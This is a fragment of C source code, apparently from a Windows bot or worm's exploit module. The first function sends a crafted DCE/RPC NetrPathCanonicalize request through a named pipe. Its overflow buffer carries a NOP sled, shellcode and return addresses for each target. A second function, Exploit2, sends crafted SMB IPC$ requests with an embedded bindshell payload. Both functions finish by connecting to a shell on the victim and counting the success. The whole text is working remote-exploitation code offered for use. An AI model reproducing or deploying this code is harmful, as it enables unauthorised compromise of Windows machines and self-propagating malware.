if( hPipe == INVALID_HANDLE_VALUE ) return false; memset( &BindPacket, 0, sizeof( BindPacket ) ); BindPacket.NormalHeader.versionmaj = 5; BindPacket.NormalHeader.versionmin = 0; BindPacket.NormalHeader.type = 11; BindPacket.NormalHeader.flags = 3; BindPacket.NormalHeader.representation = 0x00000010; BindPacket.NormalHeader.fraglength = sizeof( BindPacket ); BindPacket.NormalHeader.authlength = 0; BindPacket.NormalHeader.callid = 0; BindPacket.maxtsize = MAX_FRAG_SIZE; BindPacket.maxrsize = MAX_FRAG_SIZE; BindPacket.assocgid = 0; BindPacket.numelements = 1; BindPacket.contextid = 0; BindPacket.numsyntaxes = 1; memcpy( BindPacket.Interface1.byte, "\xC8\x4F\x32\x4B\x70\x16\xD3\x01\x12\x78\x5A\x47\xBF\x6E\xE1\x88", 16 ); BindPacket.Interface1.version = 3; memcpy( BindPacket.Interface2.byte, "\x04\x5d\x88\x8a\xeb\x1c\xc9\x11\x9f\xe8\x08\x00\x2b\x10\x48\x60", 16 ); BindPacket.Interface2.version = 2; if( !WriteFile( hPipe, &BindPacket, sizeof( RPC_ReqBind ), &nBytesWritten, NULL ) ) { CloseHandle( hPipe ); return false; } ReadFile( hPipe, RecvBuff, sizeof( RecvBuff ), &nBytesRead, NULL ); srand( (int)time( NULL ) ); memset( &PStart, 0x41, sizeof( PStart ) ); memset( &PEnd, 0x41, sizeof( PEnd ) ); PStart.ReferendID = rand(); PStart.Server.length = 1; PStart.Server.offset = 0; PStart.Server.maxlength = 1; PStart.Server_Data = L''; if( Targets[ nTarget ].bIsWinXP ) { PEnd.Prefix.length = 1; PEnd.Prefix.offset = 0; PEnd.Prefix.maxlength = 1; memcpy( PEnd.Prefix_Data, "\x00\x00\x00\x00", 4 ); } else { PEnd.Prefix.length = 2; PEnd.Prefix.offset = 0; PEnd.Prefix.maxlength = 2; memcpy( PEnd.Prefix_Data, "\xeb\x02\x00\x00", 4 ); } PEnd.OutBufLen = rand() % 250 + 1; PEnd.Type = rand() % 250 + 1;; PEnd.Flags = 0; nPathLen = Targets[ nTarget ].nPathLen; pPath = (unsigned char*)malloc( nPathLen ); if( !pPath ) { CloseHandle( hPipe ); return false; } memset( pPath, 0x90, nPathLen - 2 ); memset( pPath + nPathLen - 2, 0, 2 ); nBufferPos = Targets[ nTarget ].nShellCodeAddr; memcpy( pPath + nBufferPos, stack, sizeof( stack ) - 1 ); nBufferPos += sizeof( stack ) - 1; memcpy( pPath + nBufferPos, scode, sizeof( scode ) - 1 ); nBufferPos += sizeof( scode ) - 1; nBufferPos = Targets[ nTarget ].nOffsetStartAddr; if( Targets[ nTarget ].bIsWinXP ) { memcpy( pPath + nBufferPos, &nOffset2, sizeof( nOffset1 ) ); nBufferPos += 4; nBufferPos += 8; memcpy( pPath + nBufferPos, &nOffset1, sizeof( nOffset1 ) ); nBufferPos += 4; nBufferPos += 32; memcpy( pPath + nBufferPos, &nOffset1, sizeof( nOffset1 ) ); nBufferPos += 4; nBufferPos += 8; memcpy( pPath + nBufferPos, &nOffset1, sizeof( nOffset1 ) ); nBufferPos += 4; nBufferPos += 32; nBufferPos += sizeof( wchar_t ); } else { for( size_t n = 0; n < 16; n++ ) memcpy( pPath + nBufferPos + ( n * sizeof( nOffset1 ) ), &nOffset1, sizeof( nOffset1 ) ); } nPacketSize = sizeof( PStart ) + sizeof( UNISTR2 ) + nPathLen + sizeof( wchar_t ) + 4 + sizeof( NetrPathCanonicalize_End ); pPacket = (unsigned char*)malloc( nPacketSize ); if( !pPacket ) { CloseHandle( hPipe ); free( pPath ); return false; } memset( pPacket, 0, nPacketSize ); nBufferPos = 0; memcpy( pPacket, &PStart, sizeof( PStart ) ); nBufferPos += sizeof( NetrPathCanonicalize_Start ); ( (UNISTR2*)( pPacket + nBufferPos ) )->length = (UINT32)ceil( (float)nPathLen / sizeof( wchar_t ) ); ( (UNISTR2*)( pPacket + nBufferPos ) )->offset = 0; ( (UNISTR2*)( pPacket + nBufferPos ) )->maxlength = ( (UNISTR2*)( pPacket + nBufferPos ) )->length; nBufferPos += sizeof( UNISTR2 ); memcpy( pPacket + nBufferPos, pPath, nPathLen ); nBufferPos += nPathLen; while( nBufferPos % 4 ) nBufferPos++; memcpy( pPacket + nBufferPos, &PEnd, sizeof( PEnd ) ); nBufferPos += sizeof( PEnd ); free( pPath ); memset( &ReqNormalHeader, 0, sizeof( ReqNormalHeader ) ); ReqNormalHeader.NormalHeader.versionmaj = 5; ReqNormalHeader.NormalHeader.versionmin = 0; ReqNormalHeader.NormalHeader.type = 0; ReqNormalHeader.NormalHeader.flags = 3; ReqNormalHeader.NormalHeader.representation = 0x00000010; ReqNormalHeader.NormalHeader.authlength = 0; ReqNormalHeader.NormalHeader.callid = 0; ReqNormalHeader.prescontext = 0; ReqNormalHeader.opnum = 0x1f; memset( &ov, 0, sizeof( ov ) ); ov.hEvent = CreateEvent( NULL, TRUE, FALSE, NULL ); bExit = false; nCount = 0; while( !bExit && nCount < MAX_TRIES ) { nCount++; if( !SendReqPacket_Part( hPipe, ReqNormalHeader, pPacket, nBufferPos, MAX_FRAG_SIZE, true ) ) break; if( ov.hEvent ) { if( !ReadFile( hPipe, RecvBuff, sizeof( RecvBuff ), &nBytesRead, &ov ) && GetLastError() != ERROR_IO_PENDING ) return false; else { if( WaitForSingleObject( ov.hEvent, TRY_TIMEOUT ) == WAIT_TIMEOUT ) { bExit = true; ConnectShell (exinfo, 101); exploit[exinfo.exploit].stats++; } } } } CloseHandle( hPipe ); free( pPacket ); if( ov.hEvent ) CloseHandle( ov.hEvent ); if (bExit) return true; return false; }
bool Exploit2 ( EXINFO exinfo , SOCKET sockfd, int which ) { int i; int opt = 0; char hostipc[40]; char hostipc2[40*2]; unsigned short port; unsigned char *sc; // char *sc = (char *)malloc(4096); char buf[LEN+1]; char sendbuf[(LEN+1)*2]; char req4u[sizeof(req4)+20]; char screq[BUFSIZE+sizeof(req7)+1500+440]; char screq2k[4348+4060]; char screq2k2[4348+4060]; char recvbuf[1600]; char strasm[]="\x66\x81\xEC\x1C\x07\xFF\xE4"; char strBuffer[BUFSIZE]; unsigned int targetnum = 0; int len; char smblen; char unclen; sprintf((char *)hostipc,"\\\\%s\\ipc$", exinfo.ip); for (i=0; i<40; i++) { hostipc2[i*2] = hostipc[i]; hostipc2[i*2+1] = 0; } memcpy(req4u, req4, sizeof(req4)-1); memcpy(req4u+48, &hostipc2[0], strlen(hostipc)*2); memcpy(req4u+47+strlen(hostipc)*2, req4+87, 9); smblen = 52+(char)strlen(hostipc)*2; memcpy(req4u+3, &smblen, 1); unclen = 9 + (char)strlen(hostipc)*2; memcpy(req4u+45, &unclen, 1); port = fhtons(dport)^(USHORT)0x9999; memcpy(&bindshell[176], &port, 2); sc = bindshell; // DWORD scsize = GetRNS0TerminatedShellcode(sc, 4096, GetIP(exinfo.sock), filename); // if (!scsize) { // free(sc); // return false; // } // if (which != 0) { memset(buf, NOP, LEN); //memcpy(&buf[2020], "\x3c\x12\x15\x75", 4); memcpy(&buf[2020], &ttarget[which].jmpaddr, 4); memcpy(&buf[2036], sc, strlen((const char *)sc)); memcpy(&buf[2840], "\xeb\x06\xeb\x06", 4); memcpy(&buf[2844], &ttarget[which].jmpaddr, 4); // jmp ebx addr //memcpy(&buf[2844], "\x3c\x12\x15\x75", 4); // jmp ebx addr memcpy(&buf[2856], sc, strlen((const char*)sc)); for (i=0; i<LEN; i++) { sendbuf[i*2] = buf[i]; sendbuf[i*2+1] = 0; } sendbuf[LEN*2]=0; sendbuf[LEN*2+1]=0; memset(screq2k, 0x31, (BUFSIZE+sizeof(req7)+1500)*2); memset(screq2k2, 0x31, (BUFSIZE+sizeof(req7)+1500)*2); } else { memset(strBuffer, NOP, BUFSIZE); memcpy(strBuffer+160, sc, strlen((const char*)sc)); memcpy(strBuffer+1980, strasm, strlen(strasm)); *(long *)&strBuffer[1964]=ttarget[which].jmpaddr; } memset(screq, 0x31, BUFSIZE+sizeof(req7)+1500); // printf("[*] Attacking ... "); if (fsend(sockfd, req4u, smblen+4, 0) == -1) return false; len = frecv(sockfd, recvbuf, 1600, 0); if (fsend(sockfd, req5, sizeof(req5)-1, 0) == -1) return false; len = frecv(sockfd, recvbuf, 1600, 0); if (fsend(sockfd, req6, sizeof(req6)-1, 0) == -1) return false; len = frecv(sockfd, recvbuf, 1600, 0); if ( which != 0 ) { //if ( (atoi(argv[1]) == 1) || (atoi(argv[1]) == 2)) { memcpy(screq2k, req8, sizeof(req8)-1); memcpy(screq2k+sizeof(req8)-1, sendbuf, (LEN+1)*2); memcpy(screq2k2, req9, sizeof(req9)-1); memcpy(screq2k2+sizeof(req9)-1, sendbuf+4348-sizeof(req8)+1, (LEN+1)*2-4348); memcpy(screq2k2+sizeof(req9)-1+(LEN+1)*2-4348-sizeof(req8)+1+206, shit3, sizeof(shit3)-1); if (fsend(sockfd, screq2k, 4348, 0) == -1) return false; len = frecv(sockfd, recvbuf, 1600, 0); if (fsend(sockfd, screq2k2, 4060, 0) == -1) return false; } else { memcpy(screq, req7, sizeof(req7)-1); memcpy(screq+sizeof(req7)-1, &strBuffer[0], BUFSIZE); memcpy(screq+sizeof(req7)-1+BUFSIZE, shit1, 9*16); screq[BUFSIZE+sizeof(req7)-1+1500-304-1] = 0; if (fsend(sockfd, screq, BUFSIZE+sizeof(req7)-1+1500-304, 0)== -1) return false; } // len = recv(sockfd, recvbuf, 1600, MSG_NOWAIT); Sleep(300); if (ConnectShell(exinfo)) return true; return false; // return true; }